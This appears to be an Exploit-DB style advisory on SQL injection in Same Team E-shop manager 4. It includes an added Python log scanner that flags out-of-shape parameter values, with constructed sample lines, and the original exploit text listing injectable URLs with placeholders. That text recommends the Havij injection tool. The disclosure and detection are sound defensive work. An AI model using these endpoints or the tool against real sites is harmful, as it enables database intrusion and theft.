Vendor: E-shop manager
By: Number 7
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: E-shop manager
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: N/A
CPE: a:sameteam:eshop_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2011

Same Team E-shop manager SQL Injection exploit

Same Team E-shop manager contains multiple SQL injection vulnerabilities that could allow an attacker to execute arbitrary SQL commands on the underlying database. The affected parameters are 'id_shop' in 'catalogue.php'; 'id_article' in 'article.php', 'banniere.php' and 'detail_news.php'; and 'ref' in 'detail_produit.php'.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
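
Because no patch exists, the same allow-list that the application should enforce can also be applied to web server logs to spot requests that would have failed validation. The following is an added example, not code from the vendor or from the original advisory; the value shapes (numeric ids, short alphanumeric 'ref') and the Common Log Format input are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters named in the advisory above.
AFFECTED = {
    "catalogue.php": ("id_shop",),
    "article.php": ("id_article",),
    "banniere.php": ("id_article",),
    "detail_news.php": ("id_article",),
    "detail_produit.php": ("id_shop", "ref"),
}
# Assumed value shapes (not documented by the vendor): numeric ids and a
# short alphanumeric product reference such as 200308G.
SHAPES = {
    "id_shop": re.compile(r"[0-9]{1,10}"),
    "id_article": re.compile(r"[0-9]{1,10}"),
    "ref": re.compile(r"[0-9A-Za-z]{1,32}"),
}
# Request field of a Common Log Format line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def check_target(target):
    """Return [(script, param, value)] for values outside the allow-list."""
    url = urlsplit(target)
    script = url.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl URL-decodes values and keeps repeated or empty parameters.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in AFFECTED.get(script, ()) and not SHAPES[name].fullmatch(value):
            findings.append((script, name, value))
    return findings

def scan_log(lines):
    """Yield (line_number, finding) for each request that fails validation."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        for finding in check_target(match.group(1)) if match else ():
            yield number, finding

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jun/2011:10:00:01 +0100] "GET /path/catalogue.php?id_shop=7 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [19/Jun/2011:10:00:05 +0100] "GET /path/detail_produit.php?id_shop=3&ref=200308G HTTP/1.1" 200 7301',
    '198.51.100.7 - - [19/Jun/2011:10:02:11 +0100] "GET /path/article.php?id_article=7%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [19/Jun/2011:10:02:12 +0100] "GET /path/detail_news.php?id_article= HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, (script, name, value) in scan_log(SAMPLE_LOG):
        print(f"line {number}: {script} {name}={value!r}")
```

Rejecting the same out-of-shape values at the application or reverse proxy turns this check from detection into a stopgap control until the queries themselves are fixed.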

Exploit-DB raw data:

# Exploit Title: [Same Team E-shop manager SQL Injection exploit]
# Date: [19-06-2011]
# Author: [Number 7]
# Software Link: [http://www.sameteam.com.tn/site/fr/eshop-manager.23.html]
# Tested on: [Linux]
_____________________________________________________________________________
exploits:
http://www.domain.com.tn/path/catalogue.php?id_shop=7[SQLI]

http://www.domain.com.tn/path/article.php?id_article=7[SQLI]

http://www.domain.com.tn/path/banniere.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_news.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]

----------------------------------------_----------------------------------------


Use Havij :^D it's fastest for the 4th version :D
_____________________________________________________________________________
############ Made in Tunisia +216 ############
[~] Greetz tO: [Shichemt-Älen/Ares/SWAT/S-MAN/Wx #all tunisian hackers]
[~] Home     : Tunisia :^D
############ Made in Tunisia +216 ############